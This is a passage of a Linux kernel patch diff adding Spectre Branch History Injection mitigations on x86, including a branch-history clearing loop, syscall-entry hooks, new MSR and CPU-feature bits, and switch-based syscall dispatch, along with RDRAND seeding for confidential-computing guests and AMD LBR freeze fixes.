+ #define SYSCALL(esame,emu)	.quad __s390x_ ## esame
+ 	.globl	sys_call_table
+ sys_call_table:
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index bea53385d31e3..ba815ac474a1b 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -2563,6 +2563,31 @@ config MITIGATION_RFDS
+ 	  stored in floating point, vector and integer registers.
+ 	  See also <file:Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst>
+ 
++choice
++	prompt "Clear branch history"
++	depends on CPU_SUP_INTEL
++	default SPECTRE_BHI_ON
++	help
++	  Enable BHI mitigations. BHI attacks are a form of Spectre V2 attacks
++	  where the branch history buffer is poisoned to speculatively steer
++	  indirect branches.
++	  See <file:Documentation/admin-guide/hw-vuln/spectre.rst>
++
++config SPECTRE_BHI_ON
++	bool "on"
++	help
++	  Equivalent to setting spectre_bhi=on command line parameter.
++config SPECTRE_BHI_OFF
++	bool "off"
++	help
++	  Equivalent to setting spectre_bhi=off command line parameter.
++config SPECTRE_BHI_AUTO
++	bool "auto"
++	help
++	  Equivalent to setting spectre_bhi=auto command line parameter.
++
++endchoice
++
+ endif
+ 
+ config ARCH_HAS_ADD_PAGES
+diff --git a/arch/x86/coco/core.c b/arch/x86/coco/core.c
+index 1d3ad275c3664..801e943fd2b29 100644
+--- a/arch/x86/coco/core.c
++++ b/arch/x86/coco/core.c
+@@ -3,13 +3,17 @@
+  * Confidential Computing Platform Capability checks
+  *
+  * Copyright (C) 2021 Advanced Micro Devices, Inc.
++ * Copyright (C) 2024 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+  *
+  * Author: Tom Lendacky <thomas.lendacky@amd.com>
+  */
+ 
+ #include <linux/export.h>
+ #include <linux/cc_platform.h>
++#include <linux/string.h>
++#include <linux/random.h>
+ 
++#include <asm/archrandom.h>
+ #include <asm/coco.h>
+ #include <asm/processor.h>
+ 
+@@ -128,3 +132,40 @@ u64 cc_mkdec(u64 val)
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(cc_mkdec);
++
++__init void cc_random_init(void)
++{
++	/*
++	 * The seed is 32 bytes (in units of longs), which is 256 bits, which
++	 * is the security level that the RNG is targeting.
++	 */
++	unsigned long rng_seed[32 / sizeof(long)];
++	size_t i, longs;
++
++	if (!cc_platform_has(CC_ATTR_GUEST_MEM_ENCRYPT))
++		return;
++
++	/*
++	 * Since the CoCo threat model includes the host, the only reliable
++	 * source of entropy that can be neither observed nor manipulated is
++	 * RDRAND. Usually, RDRAND failure is considered tolerable, but since
++	 * CoCo guests have no other unobservable source of entropy, it's
++	 * important to at least ensure the RNG gets some initial random seeds.
++	 */
++	for (i = 0; i < ARRAY_SIZE(rng_seed); i += longs) {
++		longs = arch_get_random_longs(&rng_seed[i], ARRAY_SIZE(rng_seed) - i);
++
++		/*
++		 * A zero return value means that the guest doesn't have RDRAND
++		 * or the CPU is physically broken, and in both cases that
++		 * means most crypto inside of the CoCo instance will be
++		 * broken, defeating the purpose of CoCo in the first place. So
++		 * just panic here because it's absolutely unsafe to continue
++		 * executing.
++		 */
++		if (longs == 0)
++			panic("RDRAND is defective.");
++	}
++	add_device_randomness(rng_seed, sizeof(rng_seed));
++	memzero_explicit(rng_seed, sizeof(rng_seed));
++}
+diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
+index 9c0b26ae51069..e72dac092245a 100644
+--- a/arch/x86/entry/common.c
++++ b/arch/x86/entry/common.c
+@@ -48,7 +48,7 @@ static __always_inline bool do_syscall_x64(struct pt_regs *regs, int nr)
+ 
+ 	if (likely(unr < NR_syscalls)) {
+ 		unr = array_index_nospec(unr, NR_syscalls);
+-		regs->ax = sys_call_table[unr](regs);
++		regs->ax = x64_sys_call(regs, unr);
+ 		return true;
+ 	}
+ 	return false;
+@@ -65,7 +65,7 @@ static __always_inline bool do_syscall_x32(struct pt_regs *regs, int nr)
+ 
+ 	if (IS_ENABLED(CONFIG_X86_X32_ABI) && likely(xnr < X32_NR_syscalls)) {
+ 		xnr = array_index_nospec(xnr, X32_NR_syscalls);
+-		regs->ax = x32_sys_call_table[xnr](regs);
++		regs->ax = x32_sys_call(regs, xnr);
+ 		return true;
+ 	}
+ 	return false;
+@@ -114,7 +114,7 @@ static __always_inline void do_syscall_32_irqs_on(struct pt_regs *regs, int nr)
+ 
+ 	if (likely(unr < IA32_NR_syscalls)) {
+ 		unr = array_index_nospec(unr, IA32_NR_syscalls);
+-		regs->ax = ia32_sys_call_table[unr](regs);
++		regs->ax = ia32_sys_call(regs, unr);
+ 	} else if (nr != -1) {
+ 		regs->ax = __ia32_sys_ni_syscall(regs);
+ 	}
+@@ -141,7 +141,7 @@ static __always_inline bool int80_is_external(void)
+ }
+ 
+ /**
+- * int80_emulation - 32-bit legacy syscall entry
++ * do_int80_emulation - 32-bit legacy syscall C entry from asm
+  *
+  * This entry point can be used by 32-bit and 64-bit programs to perform
+  * 32-bit system calls.  Instances of INT $0x80 can be found inline in
+@@ -159,7 +159,7 @@ static __always_inline bool int80_is_external(void)
+  *   eax:				system call number
+  *   ebx, ecx, edx, esi, edi, ebp:	arg1 - arg 6
+  */
+-DEFINE_IDTENTRY_RAW(int80_emulation)
++__visible noinstr void do_int80_emulation(struct pt_regs *regs)
+ {
+ 	int nr;
+ 
+diff --git a/arch/x86/entry/entry_64.S b/arch/x86/entry/entry_64.S
+index c2383c2880ec6..6624806e6904b 100644
+--- a/arch/x86/entry/entry_64.S
++++ b/arch/x86/entry/entry_64.S
+@@ -116,6 +116,7 @@ SYM_INNER_LABEL(entry_SYSCALL_64_after_hwframe, SYM_L_GLOBAL)
+ 	/* clobbers %rax, make sure it is after saving the syscall nr */
+ 	IBRS_ENTER
+ 	UNTRAIN_RET
++	CLEAR_BRANCH_HISTORY
+ 
+ 	call	do_syscall_64		/* returns with IRQs disabled */
+ 
+@@ -1539,3 +1540,63 @@ SYM_CODE_START(rewind_stack_and_make_dead)
+ 	call	make_task_dead
+ SYM_CODE_END(rewind_stack_and_make_dead)
+ .popsection
++
++/*
++ * This sequence executes branches in order to remove user branch information
++ * from the branch history tracker in the Branch Predictor, therefore removing
++ * user influence on subsequent BTB lookups.
++ *
++ * It should be used on parts prior to Alder Lake. Newer parts should use the
++ * BHI_DIS_S hardware control instead. If a pre-Alder Lake part is being
++ * virtualized on newer hardware the VMM should protect against BHI attacks by
++ * setting BHI_DIS_S for the guests.
++ *
++ * CALLs/RETs are necessary to prevent Loop Stream Detector(LSD) from engaging
++ * and not clearing the branch history. The call tree looks like:
++ *
++ * call 1
++ *    call 2
++ *      call 2
++ *        call 2
++ *          call 2
++ * 	      call 2
++ * 	      ret
++ * 	    ret
++ *        ret
++ *      ret
++ *    ret
++ * ret
++ *
++ * This means that the stack is non-constant and ORC can't unwind it with %rsp
++ * alone.  Therefore we unconditionally set up the frame pointer, which allows
++ * ORC to unwind properly.
++ *
++ * The alignment is for performance and not for safety, and may be safely
++ * refactored in the future if needed.
++ */
++SYM_FUNC_START(clear_bhb_loop)
++	push	%rbp
++	mov	%rsp, %rbp
++	movl	$5, %ecx
++	ANNOTATE_INTRA_FUNCTION_CALL
++	call	1f
++	jmp	5f
++	.align 64, 0xcc
++	ANNOTATE_INTRA_FUNCTION_CALL
++1:	call	2f
++	RET
++	.align 64, 0xcc
++2:	movl	$5, %eax
++3:	jmp	4f
++	nop
++4:	sub	$1, %eax
++	jnz	3b
++	sub	$1, %ecx
++	jnz	1b
++	RET
++5:	lfence
++	pop	%rbp
++	RET
++SYM_FUNC_END(clear_bhb_loop)
++EXPORT_SYMBOL_GPL(clear_bhb_loop)
++STACK_FRAME_NON_STANDARD(clear_bhb_loop)
+diff --git a/arch/x86/entry/entry_64_compat.S b/arch/x86/entry/entry_64_compat.S
+index 4bcd009a232bf..b14b8cd85eb23 100644
+--- a/arch/x86/entry/entry_64_compat.S
++++ b/arch/x86/entry/entry_64_compat.S
+@@ -92,6 +92,7 @@ SYM_INNER_LABEL(entry_SYSENTER_compat_after_hwframe, SYM_L_GLOBAL)
+ 
+ 	IBRS_ENTER
+ 	UNTRAIN_RET
++	CLEAR_BRANCH_HISTORY
+ 
+ 	/*
+ 	 * SYSENTER doesn't filter flags, so we need to clear NT and AC
+@@ -210,6 +211,7 @@ SYM_INNER_LABEL(entry_SYSCALL_compat_after_hwframe, SYM_L_GLOBAL)
+ 
+ 	IBRS_ENTER
+ 	UNTRAIN_RET
++	CLEAR_BRANCH_HISTORY
+ 
+ 	movq	%rsp, %rdi
+ 	call	do_fast_syscall_32
+@@ -278,3 +280,17 @@ SYM_INNER_LABEL(entry_SYSRETL_compat_end, SYM_L_GLOBAL)
+ 	ANNOTATE_NOENDBR
+ 	int3
+ SYM_CODE_END(entry_SYSCALL_compat)
++
++/*
++ * int 0x80 is used by 32 bit mode as a system call entry. Normally idt entries
++ * point to C routines, however since this is a system call interface the branch
++ * history needs to be scrubbed to protect against BHI attacks, and that
++ * scrubbing needs to take place in assembly code prior to entering any C
++ * routines.
++ */
++SYM_CODE_START(int80_emulation)
++	ANNOTATE_NOENDBR
++	UNWIND_HINT_FUNC
++	CLEAR_BRANCH_HISTORY
++	jmp do_int80_emulation
++SYM_CODE_END(int80_emulation)
+diff --git a/arch/x86/entry/syscall_32.c b/arch/x86/entry/syscall_32.c
+index 8cfc9bc73e7f8..c2235bae17ef6 100644
+--- a/arch/x86/entry/syscall_32.c
++++ b/arch/x86/entry/syscall_32.c
+@@ -18,8 +18,25 @@
+ #include <asm/syscalls_32.h>
+ #undef __SYSCALL
+ 
++/*
++ * The sys_call_table[] is no longer used for system calls, but
++ * kernel/trace/trace_syscalls.c still wants to know the system
++ * call address.
++ */
++#ifdef CONFIG_X86_32
+ #define __SYSCALL(nr, sym) __ia32_##sym,
+-
+-__visible const sys_call_ptr_t ia32_sys_call_table[] = {
++const sys_call_ptr_t sys_call_table[] = {
+ #include <asm/syscalls_32.h>
+ };
++#undef __SYSCALL
++#endif
++
++#define __SYSCALL(nr, sym) case nr: return __ia32_##sym(regs);
++
++long ia32_sys_call(const struct pt_regs *regs, unsigned int nr)
++{
++	switch (nr) {
++	#include <asm/syscalls_32.h>
++	default: return __ia32_sys_ni_syscall(regs);
++	}
++};
+diff --git a/arch/x86/entry/syscall_64.c b/arch/x86/entry/syscall_64.c
+index be120eec1fc9f..33b3f09e6f151 100644
+--- a/arch/x86/entry/syscall_64.c
++++ b/arch/x86/entry/syscall_64.c
+@@ -11,8 +11,23 @@
+ #include <asm/syscalls_64.h>
+ #undef __SYSCALL
+ 
++/*
++ * The sys_call_table[] is no longer used for system calls, but
++ * kernel/trace/trace_syscalls.c still wants to know the system
++ * call address.
++ */
+ #define __SYSCALL(nr, sym) __x64_##sym,
+-
+-asmlinkage const sys_call_ptr_t sys_call_table[] = {
++const sys_call_ptr_t sys_call_table[] = {
+ #include <asm/syscalls_64.h>
+ };
++#undef __SYSCALL
++
++#define __SYSCALL(nr, sym) case nr: return __x64_##sym(regs);
++
++long x64_sys_call(const struct pt_regs *regs, unsigned int nr)
++{
++	switch (nr) {
++	#include <asm/syscalls_64.h>
++	default: return __x64_sys_ni_syscall(regs);
++	}
++};
+diff --git a/arch/x86/entry/syscall_x32.c b/arch/x86/entry/syscall_x32.c
+index bdd0e03a1265d..03de4a9321318 100644
+--- a/arch/x86/entry/syscall_x32.c
++++ b/arch/x86/entry/syscall_x32.c
+@@ -11,8 +11,12 @@
+ #include <asm/syscalls_x32.h>
+ #undef __SYSCALL
+ 
+-#define __SYSCALL(nr, sym) __x64_##sym,
++#define __SYSCALL(nr, sym) case nr: return __x64_##sym(regs);
+ 
+-asmlinkage const sys_call_ptr_t x32_sys_call_table[] = {
+-#include <asm/syscalls_x32.h>
++long x32_sys_call(const struct pt_regs *regs, unsigned int nr)
++{
++	switch (nr) {
++	#include <asm/syscalls_x32.h>
++	default: return __x64_sys_ni_syscall(regs);
++	}
+ };
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index fd091b9dd7067..3ac069a4559b0 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
+@@ -904,8 +904,8 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 	if (!status)
+ 		goto done;
+ 
+-	/* Read branch records before unfreezing */
+-	if (status & GLOBAL_STATUS_LBRS_FROZEN) {
++	/* Read branch records */
++	if (x86_pmu.lbr_nr) {
+ 		amd_pmu_lbr_read();
+ 		status &= ~GLOBAL_STATUS_LBRS_FROZEN;
+ 	}
+diff --git a/arch/x86/events/amd/lbr.c b/arch/x86/events/amd/lbr.c
+index 38a75216c12cf..b8fe74e8e0a60 100644
+--- a/arch/x86/events/amd/lbr.c
++++ b/arch/x86/events/amd/lbr.c
+@@ -400,10 +400,12 @@ void amd_pmu_lbr_enable_all(void)
+ 		wrmsrl(MSR_AMD64_LBR_SELECT, lbr_select);
+ 	}
+ 
+-	rdmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl);
+-	rdmsrl(MSR_AMD_DBG_EXTN_CFG, dbg_extn_cfg);
++	if (cpu_feature_enabled(X86_FEATURE_AMD_LBR_PMC_FREEZE)) {
++		rdmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl);
++		wrmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl | DEBUGCTLMSR_FREEZE_LBRS_ON_PMI);
++	}
+ 
+-	wrmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl | DEBUGCTLMSR_FREEZE_LBRS_ON_PMI);
++	rdmsrl(MSR_AMD_DBG_EXTN_CFG, dbg_extn_cfg);
+ 	wrmsrl(MSR_AMD_DBG_EXTN_CFG, dbg_extn_cfg | DBG_EXTN_CFG_LBRV2EN);
+ }
+ 
+@@ -416,10 +418,12 @@ void amd_pmu_lbr_disable_all(void)
+ 		return;
+ 
+ 	rdmsrl(MSR_AMD_DBG_EXTN_CFG, dbg_extn_cfg);
+-	rdmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl);
+-
+ 	wrmsrl(MSR_AMD_DBG_EXTN_CFG, dbg_extn_cfg & ~DBG_EXTN_CFG_LBRV2EN);
+-	wrmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl & ~DEBUGCTLMSR_FREEZE_LBRS_ON_PMI);
++
++	if (cpu_feature_enabled(X86_FEATURE_AMD_LBR_PMC_FREEZE)) {
++		rdmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl);
++		wrmsrl(MSR_IA32_DEBUGCTLMSR, dbg_ctl & ~DEBUGCTLMSR_FREEZE_LBRS_ON_PMI);
++	}
+ }
+ 
+ __init int amd_pmu_lbr_init(void)
+diff --git a/arch/x86/include/asm/asm-prototypes.h b/arch/x86/include/asm/asm-prototypes.h
+index 8f80de627c60a..5cdccea455544 100644
+--- a/arch/x86/include/asm/asm-prototypes.h
++++ b/arch/x86/include/asm/asm-prototypes.h
+@@ -12,6 +12,7 @@
+ #include <asm/special_insns.h>
+ #include <asm/preempt.h>
+ #include <asm/asm.h>
++#include <asm/nospec-branch.h>
+ 
+ #ifndef CONFIG_X86_CMPXCHG64
+ extern void cmpxchg8b_emu(void);
+diff --git a/arch/x86/include/asm/coco.h b/arch/x86/include/asm/coco.h
+index 60bb26097da1a..1f97d00ad8588 100644
+--- a/arch/x86/include/asm/coco.h
++++ b/arch/x86/include/asm/coco.h
+@@ -23,6 +23,7 @@ static inline void cc_set_mask(u64 mask)
+ 
+ u64 cc_mkenc(u64 val);
+ u64 cc_mkdec(u64 val);
++void cc_random_init(void);
+ #else
+ static inline u64 cc_mkenc(u64 val)
+ {
+@@ -33,6 +34,7 @@ static inline u64 cc_mkdec(u64 val)
+ {
+ 	return val;
+ }
++static inline void cc_random_init(void) { }
+ #endif
+ 
+ #endif /* _ASM_X86_COCO_H */
+diff --git a/arch/x86/include/asm/cpufeature.h b/arch/x86/include/asm/cpufeature.h
+index f835b328ba24f..16051c6f3b13d 100644
+--- a/arch/x86/include/asm/cpufeature.h
++++ b/arch/x86/include/asm/cpufeature.h
+@@ -33,6 +33,8 @@ enum cpuid_leafs
+ 	CPUID_7_EDX,
+ 	CPUID_8000_001F_EAX,
+ 	CPUID_8000_0021_EAX,
++	CPUID_LNX_5,
++	NR_CPUID_WORDS,
+ };
+ 
+ #define X86_CAP_FMT_NUM "%d:%d"
+@@ -96,8 +98,9 @@ extern const char * const x86_bug_flags[NBUGINTS*32];
+ 	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 18, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 19, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 20, feature_bit) ||	\
++	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 21, feature_bit) ||	\
+ 	   REQUIRED_MASK_CHECK					  ||	\
+-	   BUILD_BUG_ON_ZERO(NCAPINTS != 21))
++	   BUILD_BUG_ON_ZERO(NCAPINTS != 22))
+ 
+ #define DISABLED_MASK_BIT_SET(feature_bit)				\
+ 	 ( CHECK_BIT_IN_MASK_WORD(DISABLED_MASK,  0, feature_bit) ||	\
+@@ -121,8 +124,9 @@ extern const char * const x86_bug_flags[NBUGINTS*32];
+ 	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 18, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 19, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 20, feature_bit) ||	\
++	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 21, feature_bit) ||	\
+ 	   DISABLED_MASK_CHECK					  ||	\
+-	   BUILD_BUG_ON_ZERO(NCAPINTS != 21))
++	   BUILD_BUG_ON_ZERO(NCAPINTS != 22))
+ 
+ #define cpu_has(c, bit)							\
+ 	(__builtin_constant_p(bit) && REQUIRED_MASK_BIT_SET(bit) ? 1 :	\
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index 9a157942ae3dd..7ded926724147 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -13,7 +13,7 @@
+ /*
+  * Defines x86 CPU feature bits
+  */
+-#define NCAPINTS			21	   /* N 32-bit words worth of info */
++#define NCAPINTS			22	   /* N 32-bit words worth of info */
+ #define NBUGINTS			2	   /* N 32-bit bug flags */
+ 
+ /*
+@@ -432,6 +432,18 @@
+ #define X86_FEATURE_IBPB_BRTYPE		(20*32+28) /* "" MSR_PRED_CMD[IBPB] flushes all branch type predictions */
+ #define X86_FEATURE_SRSO_NO		(20*32+29) /* "" CPU is not affected by SRSO */
+ 
++/*
++ * Extended auxiliary flags: Linux defined - for features scattered in various
++ * CPUID levels like 0x80000022, etc and Linux defined features.
++ *
++ * Reuse free bits when adding new feature flags!
++ */
++#define X86_FEATURE_AMD_LBR_PMC_FREEZE	(21*32+ 0) /* AMD LBR and PMC Freeze */
++#define X86_FEATURE_CLEAR_BHB_LOOP	(21*32+ 1) /* "" Clear branch history at syscall entry using SW loop */
++#define X86_FEATURE_BHI_CTRL		(21*32+ 2) /* "" BHI_DIS_S HW control available */
++#define X86_FEATURE_CLEAR_BHB_HW	(21*32+ 3) /* "" BHI_DIS_S HW control enabled */
++#define X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT (21*32+ 4) /* "" Clear branch history at vmexit using SW loop */
++
+ /*
+  * BUG word(s)
+  */
+@@ -479,4 +491,5 @@
+ #define X86_BUG_SRSO			X86_BUG(1*32 + 0) /* AMD SRSO bug */
+ #define X86_BUG_DIV0			X86_BUG(1*32 + 1) /* AMD DIV0 speculation bug */
+ #define X86_BUG_RFDS			X86_BUG(1*32 + 2) /* CPU is vulnerable to Register File Data Sampling */
++#define X86_BUG_BHI			X86_BUG(1*32 + 3) /* CPU is affected by Branch History Injection */
+ #endif /* _ASM_X86_CPUFEATURES_H */
+diff --git a/arch/x86/include/asm/disabled-features.h b/arch/x86/include/asm/disabled-features.h
+index 000037078db43..380e963149cc7 100644
+--- a/arch/x86/include/asm/disabled-features.h
++++ b/arch/x86/include/asm/disabled-features.h
+@@ -112,6 +112,7 @@
+ #define DISABLED_MASK18	0
+ #define DISABLED_MASK19	0
+ #define DISABLED_MASK20	0
+-#define DISABLED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 21)
++#define DISABLED_MASK21	0
++#define DISABLED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 22)
+ 
+ #endif /* _ASM_X86_DISABLED_FEATURES_H */
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 33a19ef23644d..681e8401b8a35 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -55,10 +55,13 @@
+ #define SPEC_CTRL_SSBD			BIT(SPEC_CTRL_SSBD_SHIFT)	/* Speculative Store Bypass Disable */
+ #define SPEC_CTRL_RRSBA_DIS_S_SHIFT	6	   /* Disable RRSBA behavior */
+ #define SPEC_CTRL_RRSBA_DIS_S		BIT(SPEC_CTRL_RRSBA_DIS_S_SHIFT)
++#define SPEC_CTRL_BHI_DIS_S_SHIFT	10	   /* Disable Branch History Injection behavior */
++#define SPEC_CTRL_BHI_DIS_S		BIT(SPEC_CTRL_BHI_DIS_S_SHIFT)
+ 
+ /* A mask for bits which the kernel toggles when controlling mitigations */
+ #define SPEC_CTRL_MITIGATIONS_MASK	(SPEC_CTRL_IBRS | SPEC_CTRL_STIBP | SPEC_CTRL_SSBD \
+-							| SPEC_CTRL_RRSBA_DIS_S)
++							| SPEC_CTRL_RRSBA_DIS_S \
++							| SPEC_CTRL_BHI_DIS_S)
+ 
+ #define MSR_IA32_PRED_CMD		0x00000049 /* Prediction Command */
+ #define PRED_CMD_IBPB			BIT(0)	   /* Indirect Branch Prediction Barrier */
+@@ -157,6 +160,10 @@
+ 						 * are restricted to targets in
+ 						 * kernel.
+ 						 */
++#define ARCH_CAP_BHI_NO			BIT(20)	/*
++						 * CPU is not affected by Branch
++						 * History Injection.
++						 */
+ #define ARCH_CAP_PBRSB_NO		BIT(24)	/*
+ 						 * Not susceptible to Post-Barrier
+ 						 * Return Stack Buffer Predictions.
+diff --git a/arch/x86/include/asm/nospec-branch.h b/arch/x86/include/asm/nospec-branch.h
+index 8f6f17a8617b6..1e481d308e188 100644
+--- a/arch/x86/include/asm/nospec-branch.h
++++ b/arch/x86/include/asm/nospec-branch.h
+@@ -167,11 +167,20 @@
+ .Lskip_rsb_\@:
+ .endm
+ 
++/*
++ * The CALL to srso_alias_untrain_ret() must be patched in directly at
++ * the spot where untraining must be done, ie., srso_alias_untrain_ret()
++ * must be the target of a CALL instruction instead of indirectly
++ * jumping to a wrapper which then calls it. Therefore, this macro is
++ * called outside of __UNTRAIN_RET below, for the time being, before the
++ * kernel can support nested alternatives with arbitrary nesting.
++ */
++.macro CALL_UNTRAIN_RET
+ #ifdef CONFIG_CPU_UNRET_ENTRY
+-#define CALL_UNTRAIN_RET	"call entry_untrain_ret"
+-#else
+-#define CALL_UNTRAIN_RET	""
++	ALTERNATIVE_2 "", "call entry_untrain_ret", X86_FEATURE_UNRET, \
++		          "call srso_alias_untrain_ret", X86_FEATURE_SRSO_ALIAS
+ #endif
++.endm
+ 
+ /*
+  * Mitigate RETBleed for AMD/Hygon Zen uarch. Requires KERNEL CR3 because the
+@@ -188,9 +197,8 @@
+ #if defined(CONFIG_CPU_UNRET_ENTRY) || defined(CONFIG_CPU_IBPB_ENTRY) || \
+ 	defined(CONFIG_CPU_SRSO)
+ 	ANNOTATE_UNRET_END
+-	ALTERNATIVE_2 "",						\
+-		      CALL_UNTRAIN_RET, X86_FEATURE_UNRET,		\
+-		      "call entry_ibpb", X86_FEATURE_ENTRY_IBPB
++	CALL_UNTRAIN_RET
++	ALTERNATIVE "", "call entry_ibpb", X86_FEATURE_ENTRY_IBPB
+ #endif
+ .endm
+ 
+@@ -207,6 +215,19 @@
+ .Lskip_verw_\@:
+ .endm
+ 
++#ifdef CONFIG_X86_64
++.macro CLEAR_BRANCH_HISTORY
++	ALTERNATIVE "", "call clear_bhb_loop", X86_FEATURE_CLEAR_BHB_LOOP
++.endm
++
++.macro CLEAR_BRANCH_HISTORY_VMEXIT
++	ALTERNATIVE "", "call clear_bhb_loop", X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT
++.endm
++#else
++#define CLEAR_BRANCH_HISTORY
++#define CLEAR_BRANCH_HISTORY_VMEXIT
++#endif
++
+ #else /* __ASSEMBLY__ */
+ 
+ #define ANNOTATE_RETPOLINE_SAFE					\
+@@ -235,6 +256,10 @@ extern void srso_alias_untrain_ret(void);
+ extern void entry_untrain_ret(void);
+ extern void entry_ibpb(void);
+ 
++#ifdef CONFIG_X86_64
++extern void clear_bhb_loop(void);
++#endif
++
+ extern void (*x86_return_thunk)(void);
+ 
+ #ifdef CONFIG_RETPOLINE
+diff --git a/arch/x86/include/asm/required-features.h b/arch/x86/include/asm/required-features.h
+index 7ba1726b71c7b..e9187ddd3d1fd 100644
+--- a/arch/x86/include/asm/required-features.h
++++ b/arch/x86/include/asm/required-features.h
+@@ -99,6 +99,7 @@
+ #define REQUIRED_MASK18	0
+ #define REQUIRED_MASK19	0
+ #define REQUIRED_MASK20	0
+-#define REQUIRED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 21)
++#define REQUIRED_MASK21	0
++#define REQUIRED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 22)
+ 
+ #endif /* _ASM_X86_REQUIRED_FEATURES_H */
+diff --git a/arch/x86/include/asm/syscall.h b/arch/x86/include/asm/syscall.h
+index 5b85987a5e97c..2725a4502321b 100644
+--- a/arch/x86/include/asm/syscall.h
++++ b/arch/x86/include/asm/syscall.h
+@@ -16,19 +16,17 @@
+ #include <asm/thread_info.h>	/* for TS_COMPAT */
+ #include <asm/unistd.h>
+ 
++/* This is used purely for kernel/trace/trace_syscalls.c */
+ typedef long (*sys_call_ptr_t)(const struct pt_regs *);
+ extern const sys_call_ptr_t sys_call_table[];
+ 
+-#if defined(CONFIG_X86_32)
+-#define ia32_sys_call_table sys_call_table
+-#else
+ /*
+  * These may not exist, but still put the prototypes in so we
+  * can use IS_ENABLED().
+  */
+-extern const sys_call_ptr_t ia32_sys_call_table[];
+-extern const sys_call_ptr_t x32_sys_call_table[];
+-#endif
++extern long ia32_sys_call(const struct pt_regs *, unsigned int nr);
++extern long x32_sys_call(const struct pt_regs *, unsigned int nr);
++extern long x64_sys_call(const struct pt_regs *, unsigned int nr);
+ 
+ /*
+  * Only the low 32 bits of orig_ax are meaningful, so we return int.
+@@ -129,6 +127,7 @@ static inline int syscall_get_arch(struct task_struct *task)
+ void do_syscall_64(struct pt_regs *regs, int nr);
+ void do_int80_syscall_32(struct pt_regs *regs);
+ long do_fast_syscall_32(struct pt_regs *regs);
++void do_int80_emulation(struct pt_regs *regs);
+ 
+ #endif	/* CONFIG_X86_32 */
+ 
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index e3fec47a800bf..96bd3ee83a484 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -1584,6 +1584,79 @@ static void __init spectre_v2_determine_rsb_fill_type_at_vmexit(enum spectre_v2_
+ 	dump_stack();
+ }
+ 
++/*
++ * Set BHI_DIS_S to prevent indirect branches in kernel to be influenced by
++ * branch history in userspace. Not needed if BHI_NO is set.
++ */
++static bool __init spec_ctrl_bhi_dis(void)
++{
++	if (!boot_cpu_has(X86_FEATURE_BHI_CTRL))
++		return false;
++
++	x86_spec_ctrl_base |= SPEC_CTRL_BHI_DIS_S;
++	update_spec_ctrl(x86_spec_ctrl_base);
++	setup_force_cpu_cap(X86_FEATURE_CLEAR_BHB_HW);
++
++	return true;
++}
++
++enum bhi_mitigations {
++	BHI_MITIGATION_OFF,
++	BHI_MITIGATION_ON,
++	BHI_MITIGATION_AUTO,
++};
++
++static enum bhi_mitigations bhi_mitigation __ro_after_init =
++	IS_ENABLED(CONFIG_SPECTRE_BHI_ON)  ? BHI_MITIGATION_ON  :
++	IS_ENABLED(CONFIG_SPECTRE_BHI_OFF) ? BHI_MITIGATION_OFF :
++					     BHI_MITIGATION_AUTO;
++
++static int __init spectre_bhi_parse_cmdline(char *str)
++{
++	if (!str)
++		return -EINVAL;
++
++	if (!strcmp(str, "off"))
++		bhi_mitigation = BHI_MITIGATION_OFF;
++	else if (!strcmp(str, "on"))
++		bhi_mitigation = BHI_MITIGATION_ON;
++	else if (!strcmp(str, "auto"))
++		bhi_mitigation = BHI_MITIGATION_AUTO;
++	else
++		pr_err("Ignoring unknown spectre_bhi option (%s)", str);
++
++	return 0;
++}
++early_param("spectre_bhi", spectre_bhi_parse_cmdline);
++
++static void __init bhi_select_mitigation(void)
++{
++	if (bhi_mitigation == BHI_MITIGATION_OFF)
++		return;
++
++	/* Retpoline mitigates against BHI unless the CPU has RRSBA behavior */
++	if (cpu_feature_enabled(X86_FEATURE_RETPOLINE) &&
++	    !(x86_read_arch_cap_msr() & ARCH_CAP_RRSBA))
++		return;
++
++	if (spec_ctrl_bhi_dis())
++		return;
++
++	if (!IS_ENABLED(CONFIG_X86_64))
++		return;
++
++	/* Mitigate KVM by default */
++	setup_force_cpu_cap(X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT);
++	pr_info("Spectre BHI mitigation: SW BHB clearing on vm exit\n");
++
